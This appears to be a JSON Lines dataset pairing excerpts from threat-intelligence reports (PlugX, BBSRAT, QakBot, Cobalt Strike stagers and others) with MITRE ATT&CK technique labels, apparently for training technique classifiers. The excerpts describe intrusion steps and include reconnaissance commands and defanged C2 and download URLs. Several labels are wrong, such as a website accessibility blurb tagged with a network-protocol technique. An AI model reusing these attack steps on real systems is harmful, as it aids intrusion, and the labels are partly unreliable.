{"text1":"However, while the malware used in these new attacks uses similar infection mechanisms to PlugX, it is a completely new tool with its own specific behavior patterns and architecture. We have named this tool \u201cBBSRAT. Targeting and Infrastructure . As described in earlier reports on \u201cRoaming Tiger\u201d, the attack observed in August 2015 used weaponized exploit documents that leave Russian language decoy document files after infecting the system. Figure 2 confirms that the decoy document that opens after the malware infects the system is indeed a list of international exhibitions that were conducted on Russian territory in 2015. Analysis of the command and control (C2) infrastructure shows that the newly discovered samples of BBSRAT used the same C2 domains as previously published in the \u201cRoaming Tiger\u201d campaign, including transactiona[.]com and futuresgold[.]com. This may indicate that for the newer attack campaign using BBSRAT, the adversary may have deployed purpose-built variants and\/or infrastructure for each of the intended targets. As we can see, the second command is specifically crafted to run on 64-bit versions of Microsoft Windows. Every subsequent request made by BBSRAT increments this counter by one. The following commands and sub-commands have been identified: Please refer to the appendix for a full list of identified BBSRAT samples and their associated C2 servers. Despite the fact that the information about these attackers has been public for over a year, including a listing of many of the command and control servers, they continue to reuse much of their exposed playbook","labels":"['T1546.015']"}
{"text1":"This DLL has no other noticeable characteristics, as it functions like a typical malicious sideload. After loading the encrypted payload in memory, it transfers the execution to a shellcode that is located at the beginning of the file. Once loaded in memory, the ZeroT shellcode does not present any kind of obfuscation, unlike that for PlugX. This shellcode is charged with unpacking the encrypted and compressed payload. As in the new PlugX dropper detailed below, this is done using RC4 and RtlDecompressBuffer. As in PlugX samples, the PE header of ZeroT has been tampered with, specifically the \u201cMZ\u201d and \u201cPE\u201d constants (Fig","labels":"['T1573.001']"}
{"text1":"All trusted domains, domains, and domain controllers - A list of computers and network devices on the network - The infected machine user and groups the user belongs to - The infected machine, including machine name, operating system, workstation domain, and more information - Network adapters that have connected to the machine and DNS servers","labels":"['T1069', 'T1033', 'T1016']"}
{"text1":"So this method uses psexec itself to copy the payload over the network, overwrite earlier versions (if found), and run it without waiting for any response","labels":"['T1570']"}
{"text1":"Sleeps the downloader. After that, it downloads a file from Discord. The downloaded file is in reverse byte order. Downloads file from Discord. The downloader restores the downloaded file by reversing the bytes within the file. Method that reverses the downloaded file. The restored file is a DLL and serves as the third stage of the infection chain. Retrieving third-stage public methods using Type.GetMethods","labels":"['T1105', 'T1027']"}
{"text1":"The link \u201cCheck\u201d led to a Google Docs page, which contained a link that redirected to a ZIP file. The ZIP file was hosted on a likely compromised SharePoint account and contained Domenus VBS, which downloads Harpy from https[:]\/\/fashionableeder[.]com\/info. At one victim, CARBON SPIDER subsequently deployed the aforementioned custom PS Sekur stager and profiled the Active Directory environment using the utility ADFind","labels":"['T1204.001']"}
{"text1":"1) Cannon gathers system information and saves it to a file named ini. The Trojan sends an email to sahro.bella7[at]post.cz with i.ini as the attachment, S_inf within the body and a subject with a unique system identifier via SMTPS from one of the following accounts: Bishtr.cam47 Lobrek.chizh Cervot.woprov 2) Bishtr.cam47 3) Lobrek.chizh 4) Cervot.woprov","labels":"['T1082']"}
{"text1":"Additionally, the website utilizes an AI-based application that runs in the background and optimizes its accessibility level constantly. This application remediates the website\u2019s HTML, adapts its functionality and behavior for screen-readers used by blind users, and for keyboard functions used by individuals with motor impairments","labels":"['T1095']"}
{"text1":"ESTSecurity inspected a malicious lure document discussing North Korean defectors. This lure document contained a UPX packed binary that reached out to wave[.]posadadesantiago[.]com. Based upon their report we believe SHA256: 252d1b7a379f97fddd691880c1cf93eaeb2a5e5572e92a25240b75953c88736c, either is or is strikingly similar to the document discussed in their blog post based on these similarities","labels":"['T1566.001']"}
{"text1":"The xmrig mining process joins the supportxmr mining pool using the wallet address 428uyvSqdpVZL7HHgpj2T5SpasCcoHZNTTzE3Lz2H5ZkiMzqayy19sYDcBGDCjoWbTfLBnc3tc9rG4Y8gXQ8fJiP5tqeBda. At the time of writing, the malware campaign has ~25.05 KH\/s hashing power and there is 11 XMR (~$1,500) in the wallet","labels":"['T1496']"}
{"text1":"The primary goal of the Dark Halo\u00a0threat actor was to obtain the e-mails of specific individuals at the think tank. This included a handful of select executives, policy experts, and the IT staff at the organization. Volexity notes its investigations are directly related to the FireEye report based on overlap between command-and-control (C2) domains and other related indicators such as a backdoored server running SolarWinds Orion","labels":"['T1114.002']"}
{"text1":"Finally, it creates and runs a shell script at \/tmp\/.server.sh, which also establishes a reverse shell","labels":"['T1059.003', 'T1059.004']"}
{"text1":"As with campaigns attributed to BlackEnergy group the attackers used spearphishing emails with Microsoft Excel documents attached that contain malicious macros as an initial infection vector. This time malicious documents don\u2019t have any content with social engineering directing potential victims to click an Enable Content button","labels":"['T1566.001']"}
{"text1":"1) The infection chain used in this attack begins with a weaponized link to a Google Drive folder, obfuscated using the goo.gl link shortening service. 2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs. 4) The .lnk file uses an embedded VBScript component to retrieve a decoy PDF file and a PowerShell script from the adversary-controlled web page. 5) The PowerShell script creates a Cobalt Strike stager payload. This PowerShell script also retrieves an XOR-encoded Cobalt Strike beacon payload from an adversary-controlled domain. 6) The Cobalt Strike Beacon implant beacons to the command-and-control (C2) IP address, which is used to remotely control the implant","labels":"['T1027']"}
{"text1":"When executing the code, the browser creates an invisible image tag and sets the URL to an attack server using the file:\/\/ protocol scheme. On Windows machines, this triggers a request to a remote server via the Samba networking protocol (SMB) that also transmits the user\u2019s login NTLM hash. These hashes can be cracked to retrieve the original login password by methods of brute-force, dictionary, or rainbow table lookups","labels":"['T1003.004', 'T1552.001', 'T1555.003', 'T1003.005', 'T1555', 'T1003.001']"}
{"text1":"The ProgramArguments tell us where GrowlHelper is installed and that it takes at least one command line argument (-f). The RunAtLoad key confirms the implant will run every time the user logs in. To get an overview of the installation process, we can monitor file system activity for GrowlHelper events","labels":"['T1546.004']"}
{"text1":"TrickBot has arguably been one of the most popular Trojans for the past couple of years, used by threat actors mostly because of its modular design and highly resilient infrastructure. Bitdefender researchers even analyzed one of its modules earlier this year, particularly because it targeted telecom, education, and financial services in the US and Hong Kong","labels":"['T1090.002']"}
{"text1":"When executed, BoomBox ensures that a directory named NV is present in its current working directory; otherwise it terminates. If the directory is present, BoomBox displays the contents of the NV directory in a new Windows Explorer window (leaving it up to the user to open the PDF file","labels":"['T1480', 'T1083', 'T1480', 'T1480']"}
{"text1":"Like many other phishing attacks, in this phishing campaign, Charming Kitten uses a fake SMS (Figure 1) to trick their victims. They send confirmation messages stating \u2018Google Account Recovery\u2019 to their targets; they claim these messages are sent by Google and the user must follow the link in the SMS to confirm the identity","labels":"['T1598.003']"}
{"text1":"Viewing results Commands scheduled with at run as background processes. Output is not displayed on the computer screen. To redirect output to a file, use the redirection symbol (>). If you redirect output to a file, you need to use the escape symbol (^) before the redirection symbol, whether you are using at at the command line or in a batch file. For example, to redirect output to Output.text, type: at 14:45 c:\\test.bat ^>c:\\output.txt The current directory for the executing command is the systemroot folder. Changing system time If you change the system time at a computer after you schedule a command to run with at, synchronize the at scheduler with the revised system time by typing at without command-line options. Storing commands Scheduled commands are stored in the registry. As a result, you do not lose scheduled tasks if you restart the Schedule service. Connecting to network drives Do not use a redirected drive for scheduled jobs that access the network. The Schedule service might not be able to access the redirected drive, or the redirected drive might not be present if a different user is logged on at the time the scheduled task runs. Instead, use UNC paths for scheduled jobs","labels":"['T1053.002']"}
{"text1":"BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy","labels":"['T1071.001']"}
{"text1":"BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress. For full, comprehensive documentation of the tool and all of its commands, see bitsadmin and bitsadmin examples in the Windows IT Pro Center","labels":"['T1105']"}
{"text1":"Once the malware starts it tries to reach a hardcoded C2. The communication takes place using the unmodified HTTP-based protocol, the request and response body are RC4-encrypted, and the encryption key is also hardcoded into the sample. As the result of the RC4 encryption may contain binary data, the malware additionally encodes it in BASE64, to match the HTTP specification","labels":"['T1071.001']"}
{"text1":"TG-3390 uses DLL side loading, a technique that involves running a legitimate, typically digitally signed, program that loads a malicious DLL. The DLL acts as a stub loader, which loads and executes the shell code. The adversaries have used this technique to allow PlugX and HttpBrowser to persist on a system","labels":"['T1574.002']"}
{"text1":"1) User must open the Microsoft Word email attachment 2) User must scroll to page three of the document, which will run the DealersChoice Flash object 3) The Flash object must contact an active C2 server to download an additional Flash object containing exploit code 4) The initial Flash object must contact the same C2 server to download a secondary payload 5) Victim host must have a vulnerable version of Flash installed","labels":"['T1203']"}
{"text1":"This agent also built in a function aptly named \u201cDeleteLeftovers,\u201d to remove certain artifacts of the attack","labels":"['T1070']"}
{"text1":"In addition to the aforementioned DOCX file, we found another related DDE enabled document based on an infrastructure overlap with a Zebrocy C2 IP address. This related delivery document was an RTF file that downloaded and installed a payload used to load the open-source Koadic tool. We do not have telemetry on the target or attack vector, but we know the RTF file used DDE to download and execute an executable that loaded Koadic. We believe the actor used a cryptor on the payload, as it obtains a filename and script from within its resources and decodes these resources by multiplying each byte by negative one. The payload then uses the MD5 hash (14331d289e737093994395d3fc412afc) of what appears to be a hardcoded SHA1 hash (B6A75B1EF701710D7AEADE0FE93DE8477F3BD506) as an RC4 key to decrypts the resulting decoded data. The embedded VBScript is retrieved from a resource and decrypted using the same algorithm as discussed above, which results in the following cleartext","labels":"['T1140']"}
{"text1":"Impersonation using Kerberos pass-the-ticket attacks (Mimikatz PowerShell) - Email extraction from the MS Exchange Server using compromised credentials - Archiving sensitive information - Data exfiltration via legitimate cloud services - Secure file deletion","labels":"['T1059.001', 'T1550.003', 'T1114.002', 'T1078']"}
{"text1":"Computer name - System info using: cmd \/c systeminfo >%temp%\\temp.ini - List of currently running process using: cmd \/c tasklist >%temp%\\temp.ini","labels":"['T1082']"}
{"text1":"Different drivers will be loaded based on the system version. The malware uses IsWow64Process to determine which driver version to load. These drivers are stored in the resource section of the binary and are compressed with the Lempel-Ziv algorithm. The driver file is written to system32\\drivers with a 4-character, pseudo-randomly generated name. This file is then decompressed using LZCopy to a new file with a \u201c.sys\u201d extension","labels":"['T1027', 'T1140']"}
{"text1":"The main purpose of P8RAT is downloading and executing payloads (consisting of PE and shellcode) from its C2 server","labels":"['T1001.001']"}
{"text1":"Throughout 2017 and 2018 Unit 42 has been tracking and observing a series of highly targeted attacks focused in South East Asia, building on our research into the KHRAT Trojan. Based on the evidence, these attacks appear to be conducted by the same set of attackers using previously unknown malware families. In addition, these attacks appear to be highly targeted in their distribution of the malware used, as well as the targets chosen. We believe this group is previously unidentified and therefore have we have dubbed it \u201cRANCOR\u201d. The Rancor group\u2019s attacks use two primary malware families which we describe in depth later in this blog and are naming DDKONG and PLAINTEE. DDKONG is used throughout the campaign and PLAINTEE appears to be new addition to these attackers\u2019 toolkit. Countries Unit 42 has identified as targeted by Rancor with these malware families include, but are not limited to","labels":"['T1059.005', 'T1105']"}
{"text1":"To avoid detection, the macros employ simple obfuscation of interesting strings that ultimately just used base64 encoding. However, it used a somewhat unusual method where it would first convert the base64-encoded text into hex, and then convert that hex into a text string","labels":"['T1027']"}
{"text1":"Some additional log file analysis reveals that a dotm file hosted with a. jpg extension was accessed by an Israeli IP address. This IP address likely belongs to a victim in Israel that executed the main DOCX. Based on the analysis of the user-agent string belonging to the Israel IP address Microsoft+Office+Existence+Discovery indicates that the dotm file in question was downloaded from within Microsoft Office (template injection","labels":"['T1480']"}
{"text1":"1) It uses the application programming interface (API) CreateFileA to \\\\.\\PHYSICALDRIVE0 to retrieve the handle of the hard disk. 2) It overwrites the first sector of the disk (512 bytes) with \"0x00\". The first sector is the disk\u2019s MBR. 3) It will try to perform the routines above (steps 1-2) on \\\\.\\PHYSICALDRIVE1, \\\\.\\PHYSICALDRIVE2, \\\\.\\PHYSICALDRIVE3, and so on, as long as a hard disk is available","labels":"['T1082']"}
{"text1":"Upon further inspection, Kroll learned that an employee using their work computer had clicked on a malicious link from their personal email account that downloaded a Qakbot dropper","labels":"['T1059.005']"}
{"text1":"This activity has TTP and targeting overlap with previous activity, suspected to be APT29. The 2018 and 2016 LNK files are similar in structure and code, and contain significant metadata overlap, including the MAC address of the system on which the LNK was created","labels":"['T1204.001', 'T1566.001']"}
{"text1":"APT19 used three different techniques to attempt to compromise targets. Toward the end of May, APT19 switched to using macro-enabled Microsoft Excel (XLSM) documents. In the most recent versions, APT19 added an application whitelisting bypass to the XLSM documents","labels":"['T1218.010']"}
{"text1":"WastedLocker aims to encrypt the files of the infected host. However before the encryption procedure runs, WastedLocker performs a few other tasks to ensure the ransomware will run properly","labels":"['T1574.001']"}
{"text1":"Attempted to blend in with a file name that matched the system name it resided on - Configured for WMI persistence (generally uncommon in 2019) - Used likely compromised infrastructure for C2 - Masquerades its command-and-control (C2) traffic as legitimate Google Notifications HTTP requests","labels":"['T1071.001', 'T1001']"}
{"text1":"In most systems compromised by Kobalos, the SSH client is compromised to steal credentials. This credential stealer is unlike any of the malicious OpenSSH clients we\u2019ve seen before, and we\u2019ve looked at tens of them in the past eight years. The sophistication of this component is not the same as Kobalos itself: there was no effort to obfuscate early variants of the credential stealer. However, we found newer variants that contain some obfuscation and the ability to exfiltrate credentials over the network","labels":"['T1048']"}
{"text1":"The C2 server can also send a PowerShell command to capture and store a screenshot of a victim\u2019s system. POWRUNER will send the captured screenshot image file to the C2 server if the \u201cfileupload\u201d command is issued. Figure 6 shows the PowerShell \u201cGet-Screenshot\u201d function sent by the C2 server","labels":"['T1113']"}
{"text1":"At installation, the MSI file drops three files and creates one hidden directory (UFile) into C:\\ProgramData\\Apple\\Update\\, likely as a ruse","labels":"['T1564.001', 'T1564.001']"}
{"text1":"On execution, the MSI downloader starts by checking if it is running in a virtual machine. If not, downloads a zip file, unzips it, deletes itself, establishes persistency and restarts the system","labels":"['T1140', 'T1102.003']"}
{"text1":"ServHelper\u2019s payload, an NSIS Installer signed with a valid digital signature (further details on the certificate ahead), is downloaded by msiexec.exe to its temporary folder (C:\\Windows\\Installer\\MSI[4-charachter-string].tmp) and executed","labels":"['T1218.007']"}
{"text1":"secretsdump.py: Performs various techniques to dump secrets from the remote machine without executing any agent there. For DIT files, we dump NTLM hashes, Plaintext credentials (if available) and Kerberos keys using the DL_DRSGetNCChanges() method. It can also dump NTDS.dit via vssadmin executed with the smbexec\/wmiexec approach. mimikatz.py: Mini shell to control a remote mimikatz RPC server developed by @gentilkiwi","labels":"['T1003.004', 'T1003.002', 'T1003.003', 'T1003.001']"}
{"text1":"To recap, on September 18, 2017, we disclosed that CCleaner had been targeted by cybercriminals, in order to distribute malware via the CCleaner installation file. The altered installation file was downloaded by 2.27 million CCleaner customers worldwide. The malware was introduced to the build server of Piriform, the company developing CCleaner, some time between March 11 and July 4, 2017, prior to Avast\u2019s acquisition of Piriform on July 18, 2017","labels":"['T1195.002']"}
{"text1":"These credentials are used in a credential stuffing or password spraying attack against the victim\u2019s remote services, such as webmail or other internet reachable mail services. After obtaining a valid account, they use this account to access the victim\u2019s VPN, Citrix or another remote service that allows access to the network of the victim. Information regarding these remotes services is taken from the mailbox, cloud drive, or other cloud resources accessible by the compromised account. As soon as they have a foothold on a system (also known as patient zero or index case), they check the permissions of the account on that system, and attempt to obtain a list of accounts with administrator privileges. With this list of administrator-accounts, the adversary performs another password spraying attack until a valid admin account is compromised. From here on the adversary stops using the victim\u2019s remote service to access the victim\u2019s network, and starts using the Cobalt Strike beacon for remote access and command and control","labels":"['T1082']"}
{"text1":"This dynamic link library appears to be a legitimate version of libcurl.dll\u202fexcept for\u202fa single exported function, which is referred to as ordinal #52 and\u202fcurl_share_init\u202fin the analyzed sample. This function has been modified by threat actors to extract a resource contained within libcurl.dll, decrypt malicious data\u202fincluded in that resource, and load the resulting DLL to execute a malicious function. When this function is executed, the\u202fSodomNormal\u202fcommunications module begins running within Libcurl.dll","labels":"['T1140']"}
{"text1":"Wscript.exe does a number of things: It deletes the original QakBot.vbs and writes four files to disk in %APPDATA% induce.flac, pep.csv, rhythm.tex and senate.m4a. Senate.m4a is deleted after full process execution","labels":"['T1070.004']"}
{"text1":"These privilege escalation modules are the ones we caught when we queried for Jian\u2019s global configuration table. We also found a couple of more Local Privilege Escalation exploits from the NtElevation series","labels":"['T1068']"}
{"text1":"First, several of these commands contain checks to determine the environment in order to use appropriate paths or commands. The \u2018tasklist\u2019 command will use a WMI query or the \u201cps\u201d command, which allows Kazuar to obtain running processes from both Windows and Unix systems. Also, Kazuar\u2019s \u2018cmd\u2019 command will run commands using \u201ccmd.exe\u201d for Windows systems and \u201c\/bin\/bash\u201d for Unix systems. These two commands provide evidence that the authors of Kazuar intended to use this malware as a cross-platform tool to target both Windows and Unix systems","labels":"['T1059.003']"}
{"text1":"All the commands received from the C2 are first saved to an auxiliary file and then stored encrypted in the system registry. The standalone thread will decrypt and execute them","labels":"['T1059.003', 'T1047']"}
{"text1":"sifo \u2013 Collect victim system information - drive \u2013 List drives on victim machine - list \u2013 List file information for provided directory - upload \u2013 Upload a file to the victim machine - open \u2013 Spawn a command shell","labels":"['T1082', 'T1083', 'T1105', 'T1082', 'T1083']"}
{"text1":"The buffer containing the ZxShell Dll in the new location is freed using the VirtualFree API function. A handle to the DLL file is taken in order to make its deletion more difficult. The ZxShell mutex is created named @_ZXSHELL_","labels":"['T1218.011']"}
{"text1":"Use of Open Source Tools In an attempt to avoid detection and as an anti-analysis tactic, the OilRig group abused an open source tool called Invoke-Obfuscation to obfuscate the code used for QUADAGENT. Invoke-Obfuscation is freely available via a Github repository and allows a user to change the visual representation of a PowerShell script simply by selecting the desired obfuscation techniques. Invoke-Obfuscation offers a variety of obfuscation techniques, and by analyzing the script we were able to ascertain the specific options in this attack. After identifying the specific options used to obfuscate QUADAGENT, we were able to deobfuscate the PowerShell script and perform additional analysis. We found two obfuscation techniques applied to the script: the first one changing the representation of variables; the second one changing the representation of strings in the script. Invoke-Obfuscation calls the string obfuscation used by the actors to further obfuscate this script Reorder, which uses the string formatting functionality within PowerShell to reconstruct strings from out of order substrings (ex. 1}{0}\" -f 'bar','foo'). During our analysis, we installed Invoke-Obfuscation and used it to obfuscate a previously collected QUADAGENT sample to confirm our analysis","labels":"['T1059.001']"}
{"text1":"Further into the infection process, the malware chooses a service name randomly from netsvc in order to use it for the payload creation path. The malware then creates a file named bcdbootinfo.tlp in the system folder containing the infection time and the random service name that is chosen. We\u2019ve discovered that the malware operator checks this file to see whether the remote host was infected and, if so, when the infection happened","labels":"['T1547.001']"}
{"text1":"Between August 2 and 4, the actor sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors","labels":"['T1204.001']"}
{"text1":"The module gathers information about the user and attempts to verify whether this is a local admin or a domain admin. This shows that after infecting the machine, Valak chooses to target mainly administrators and domain admins. This indicates a propensity to target higher profile accounts such as enterprise admins","labels":"['T1087.001', 'T1087.002']"}
{"text1":"The initial routine decrypts selected parts of the code section using XOR with a hardcoded value","labels":"['T1027']"}
{"text1":"A second method consists to use the CredEnumerateW Windows API. Finally, Perfc.dat contains three embedded executables in its resource section which are compressed with zlib. Two of the executables are used to recover user credentials (32 and 64 bits) while the third one is the PsExec binary","labels":"['T1021.002']"}
{"text1":"It can download and execute arbitrary code provided from the C&C server, as well as maintain a virtual file system (VFS) inside the registry. The VFS, and any additional files created by the code, are encrypted and stored in a location unique to each victim","labels":"['T1027']"}
{"text1":"In June 2015, a number of web portal email accounts were hacked, sending emails with malicious Hangul document files and phishing emails to steal portal account credentials. In January 2016, a large number of emails with malicious attachments were sent under the guise of \u2018Office of National Security at the Blue House\u2019 to government research institutes. Analysis by related organizations identified the malicious attachment as Kimsuky malware [3","labels":"['T1586.002']"}
{"text1":"Both malicious programs share the code for LZMA compression algorithm. In CloudAtlas it is used to compress the logs and to decompress the decrypted payload from the C&C servers, while in Red October the \u201cscheduler\u201d plugin uses it to decompress executable payloads from the C&C","labels":"['T1059.001', 'T1059.005']"}
{"text1":"X-Session: 0\"). Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell. The malware can be configured to use multiple network protocols to avoid network-based detection. DLL side loading is often used to maintain persistence on the compromised system. Antivirus detection for HttpBrowser is extremely low and is typically based upon heuristic signatures. DLL side loading has been used to maintain persistence on the compromised system. More information about HttpBrowser is available in Appendix B. HttpBrowser URI. Source: Dell SecureWorks) - ChinaChopper web shell \u2014 A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system. TG-3390 has used additional web shells containing similarly formatted passwords","labels":"['T1071.004']"}
{"text1":"Similar to RIPTIDE campaigns, APT12 infects target systems with HIGHTIDE using a Microsoft Word (.doc) document that exploits CVE-2012-0158. FireEye observed APT12 deliver these exploit documents via phishing emails in multiple cases. Based on past APT12 activity, we expect the threat group to continue to utilize phishing as a malware delivery method","labels":"['T1203']"}
{"text1":"The screenshot in Figure 8 of the inf method within a Cannon sample (SHA256: 4405cfbf28. ) shows the information gathered that is exfiltrated to the C2 via email, specifically with RunningPlace and LogicalDrives header strings","labels":"['T1082']"}
{"text1":"The second generation (2.x) was used to conduct an attack which we investigated during its active stage. We successfully prevented data transfer to the cybercriminals\u2019 server and isolated the infected systems in the company\u2019s local network. The incidents, as well as results of our investigation, are described in the full report on the Winnti group (PDF","labels":"['T1014']"}
{"text1":"Conficker will copy itself with a random name into the system directory %systemroot%\\system32 and register itself as a service. The remote computer will then download the worm from the URL given and then start to infect other machines as well. Upon successful infection, it will also patch the hole to prevent other worms to infect the machine\" (Racicot","labels":"['T1046', 'T1112']"}
{"text1":"On October 28, we observed APT3 sending out spearphishing messages containing a compressed executable attachment. The deflated exe was a variant of the same downloader described above and connected to 198.55.115.71 over port 1913 via SOCKS5 proxy. The secondary payload in that case was detected as Backdoor.APT.CookieCutter (aka Pirpi) and also named newnotepad.exe (MD5 8849538ef1c3471640230605c2623c67) and connected to the known APT3 domains","labels":"['T1090.002', 'T1095']"}
{"text1":"You are using Microsoft Internet Explorer. We recommend using Chrome or Firefox for the best experience","labels":"['T1059.003']"}
{"text1":"In addition, PLAINTEE will create a unique GUID via a call to CoCreateGuid() to be used as an identifier for the victim. The malware then proceeds to collect general system enumeration data about the infected machine and enters a loop where it will decode an embedded config blob and send an initial beacon to the C2 server. The configuration blob is encoded using a simple single-byte XOR scheme. The first byte of the string is used as the XOR key to in turn decode the remainder of the data","labels":"['T1573.001']"}
{"text1":"We named Lazarus the most active group of 2020. We\u2019ve observed numerous activities by this notorious APT group targeting various industries. The group has changed target depending on the primary objective. Google TAG has recently published a post about a campaign by Lazarus targeting security researchers. We have seen Lazarus attack various industries using this malware cluster before. In mid-2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. NukeSped). While investigating this activity, we were able to observe the complete life cycle of an attack, uncovering more technical details and links to the group\u2019s other campaigns","labels":"['T1005', 'T1566.002', 'T1204.002']"}
{"text1":"Once the initial computer on the targeted organization\u2019s network is infected with Vcrodat, Whitefly begins mapping the network and infecting further computers. The attackers rely heavily on tools such as Mimikatz to obtain credentials. Using these credentials, the attackers are able to compromise more machines on the network and, from those machines, again obtain more credentials","labels":"['T1588.002', 'T1068']"}
{"text1":"The diagram below illustrates the methodology used by the actor to communicate with the FoggyWeb backdoor located on a compromised internet-facing AD FS server","labels":"['T1071.001']"}
{"text1":"id \u2014 the generated unique identifier of the infected host - message \u2014 the Base64-encoded output from the newly created cmd.exe console process","labels":"['T1027']"}
{"text1":"The archive contains\u00a0a\u00a0legitimate\u00a0older version of Microsoft Word (Microsoft Word 2007)\u00a0executable file\u00a0that\u00a0is\u00a0named\u00a0\u2018Noi\u00a0dung chi\u00a0tiet\u00a0don\u00a0khieu\u00a0nai\u00a0gui\u00a0cong\u00a0ty.exe\u2019\u00a0which\u00a0translates to\u00a0\u2018Learn more about how to use your company\u2019\u00a0in English. The attacker used\u00a0the DLL side loading technique to load a malicious DLL by the older\u00a0version of Microsoft Word. When opening the executable file in the archive, it\u00a0loads\u00a0the\u00a0malicious DLL in the same directory. The DLL\u00a0executes multi-stage shellcodes\u00a0and each shellcode employs various technique to hide the next stage","labels":"['T1574.002']"}
{"text1":"Summary In early May, Unit 42 discovered an attack campaign against at least one defense company in Russia and one unidentified organization in South Korea delivering a variant of Bisonal malware. While not previously publicly documented, the variant has been in the wild since at least 2014. There are three primary differences between it and older Bisonal malware including a different cipher and encryption for C2 communication, and a large rewrite of the code for both network communication and maintaining persistence. The adversary behind these attacks lured the targets into launching the Microsoft Windows executable malware by masquerading it as a PDF file (using a fake PDF icon) and reusing publicly available data for the decoy PDF file\u2019s contents. Attacks using Bisonal have been blogged about in the past. We believe it is likely these tools are being used by one group of attackers. Though Bisonal malware has been in the wild for at least seven years and frequently updated, the actors keep using same high-level playbooks. Common features of attacks involving Bisonal include","labels":"['T1105']"}
{"text1":"After decoding the PDF and AppleSeed payload, the content gets written into the ProgramData directory. At the end, the decoy PDF file is opened by calling Wscript.Shell.Run and the AppleSeed payload executed through PowerShell by calling regsvr32.exe. Calling regsvr32.exe to run a DLL registers it as a server that automatically calls the DLL export function that has been named DllRegisterServer","labels":"['T1218.010']"}
{"text1":"To illustrate a real example of how this worked and looked to a website visitor, the following section will use one of the few pages of the fake site baomoivietnam[.]com that was designed to profile visitors and deliver malware or a phishing link. On this site, a news story (https:\/\/www.baomoivietnam[.]com\/dai-hoc-ton-duc-thang-hieu-truong-lam-quyen-de-xay-ra-sai-pham\/) about an investigation into potential improper conduct by a university professor in Vietnam contained malicious content. Once the page was accessed, a special OceanLotus server on the hostname\u00a0cdn.arbenha[.]com would be leveraged to load malicious JavaScript to load a fake video player. At first, the page would display a dialog indicating that the video was loading (\u0110ang t\u1ea3i) as shown in Figure 1 below","labels":"['T1598.003']"}
{"text1":"In November 2019, when MegaCortex v4 appeared, there was a rollback of sorts, bringing the Base64 key back into play and using it to decrypt the malware\u2019s components. The implementation was not the same as previous versions, with that Base64 key embedded into the binary and then passed to a decrypting function instead of passing it as an argument to the command-line","labels":"['T1140']"}
{"text1":"The script sets up a new HTTP object and then tries to disable the system's local proxy settings","labels":"['T1562.001']"}
{"text1":"Bisonal main module The DLL (pvcu.dll) is Bisonal malware but using a different cipher for C2 communication that other publicly documented samples. Booz Allen Hamilton in 2014 and AhnLab in 2015 reported on Bisonal using a simple XOR cipher to hide the C2 address strings in the body. The Bisonal sample we observed in this case employs the RC4 cipher with the key \u201c78563412\u201d. To date, all Bisonal samples we have seen using RC4 use this same key. The oldest sample we have dates to 2014, so this variant has been in the wild for several years. For example, the Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2","labels":"['T1082', 'T1071.001', 'T1140']"}
{"text1":"When executed, QakBot will check whether it has previously been executed on the machine by checking for the specified malware folder. If QakBot discovers it is a first time run, it will relaunch itself from cmd.exe with the \/C parameter that will inform the loader to proceed and run its Anti-VM checks on the machine and return the results to the parent process. If QakBot detects it is running in a VM environment, then the final payload will not be decrypted since QakBot uses the return value from these checks in its final decryption routine. Figure 7 below shows the QakBot environment check logic","labels":"['T1057', 'T1055.012', 'T1059.003', 'T1083']"}
{"text1":"loaddl: a command responsible for downloading and executing additional modules using the rundll32.exe process. selfkill: a command that is responsible for self-terminating and deleting the malware from the machine","labels":"['T1105']"}
{"text1":"WMI permanent event subscriptions can be used to trigger actions when specified conditions are met. Attackers often use this functionality to persist the execution of backdoors at system start up. Subscriptions consist of three core WMI classes: a Filter, a Consumer, and a FilterToConsumerBinding. WMI Consumers specify an action to be performed, including executing a command, running a script, adding an entry to a log, or sending an email. WMI Filters define conditions that will trigger a Consumer, including system startup, the execution of a program, the passing of a specified time and many others. Creating a WMI permanent event subscription requires administrative privileges on a system","labels":"['T1546.003']"}
{"text1":"The RTF file contains macro codes that will execute a PowerShell command to retrieve a dynamic-link library (DLL) file before executing it using odbcconf.exe, a command-line utility related to Microsoft Data Access Components. The DLL will drop and execute a malicious JScript using regsvr32.exe, another command-line utility, to download another JScript and execute it using the same regsvr32.exe. During analysis, we received a PowerShell command that downloads Cobalt Strike from hxxps:\/\/5[.]135[.]237[.]216[\/]RLxF","labels":"['T1059.001', 'T1218.010', 'T1218.008']"}
{"text1":"In additional to the browsers credential stealer, Olympic Destroyer drops and executes a system stealer. The stealer attempts to obtain credentials from LSASS with a technique similar to that used by Mimikatz","labels":"['T1555.003', 'T1003.001']"}
{"text1":"The SOMBRAT backdoor is packaged as a 64-bit Windows executable. It communicates with a configurable command and control (C2) server via multiple protocols, including DNS, TLS-encrypted TCP, and potentially WebSockets. The backdoor's primary purpose is to download and execute plugins provided via the C2 server. In contrast to the SOMBRAT version published in November 2020, Mandiant observed additional obfuscation and armoring to evade detection, this SOMBRAT variant has been hardened to discourage analysis. Program metadata typically included by the compiler has been stripped and strings have been inlined and encoded via XOR-based routines","labels":"['T1095']"}
{"text1":"As seen in the above image, the Bazar backdoor can handle quite a few commands. This next section focuses on case 1, which retrieves various pieces of additional information on the infected machine","labels":"['T1005']"}
{"text1":"2) Scan the network environment of the infected machine; checks for availability of specific ports on servers that share the same internal and external subnet mask (i.e 255.255.0.0\\16). 3) Try to exploit the following Remote Code Execution vulnerabilities in the targeted servers","labels":"['T1046']"}
{"text1":"Harvest cookies and a password database for supported browsers. Supports: Win7 IE, Win10 IE, Edge, Chrome, and Naver Whale - Recursively search a path and upload file metadata (timestamps, size, and full path). - Spawn a thread to recursively search a path and upload files as a ZIP archive","labels":"['T1539']"}
